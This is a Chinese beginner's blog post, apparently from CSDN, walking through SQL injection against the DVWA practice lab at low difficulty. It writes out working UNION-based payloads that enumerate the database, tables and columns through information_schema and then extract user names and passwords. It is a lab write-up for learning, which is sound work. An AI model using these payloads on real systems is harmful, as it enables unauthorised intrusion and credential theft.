小白打DVWA靶场sql injection注入LOW难度

1、输入 1'        报错,判断有注入点,并且显示mysql数据库

2、输入1 and 1=1 能正常输出结果

再输入1 and 1=2 也能正常输出结果    

判断不是数值型输入(如果是数值型输入,那么1=2应该不会显示出来)

3、输入1' and '1'='1 能正常输出 

      输入1' and '1'='2 不能正常输出

      输入1"and "1"="1 也能正常输出

      输入1"and "1"="2 也能正常输出

判断出来,是单引号的字符注入。

4、开始通过order by 判断有多少字段数

        输入 1’ order by 1 能正常输出 

        输入 1’ order by 2 能正常输出 

        输入 1’ order by 3 报错                        判断字段数只有2

5、开始使用联合查询数据库名

        1' union select 1,database()  #                        (#用于注释掉后面的符号)

        得到数据库名为dvwa

6、再查找dvwa数据库中的所有表名

       1' union select 1,table_name  from information_schema.tables where table_schema='dvwa' #

(information_schema数据库中tables用于存放数据库所有的表)

得出来有两个表,一个是guestbook,一个是users;

7、再查看users表的所有列

1' union select 1,column_name from information_schema.columns where table_schema = 'dvwa' and table_name='users' #

(information_schema数据库中columns用于存放数据库所有的列 )

的出来有列user_name和password

8、最后找到对应用户姓名和密码

1' union select user , password from dvwa.users #

学习帖子:网络安全-靶机dvwa之sql注入Low到High详解(含代码分析)_在dvwa平台中完成一次sql注入,安全等级为初级。-CSDN博客

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值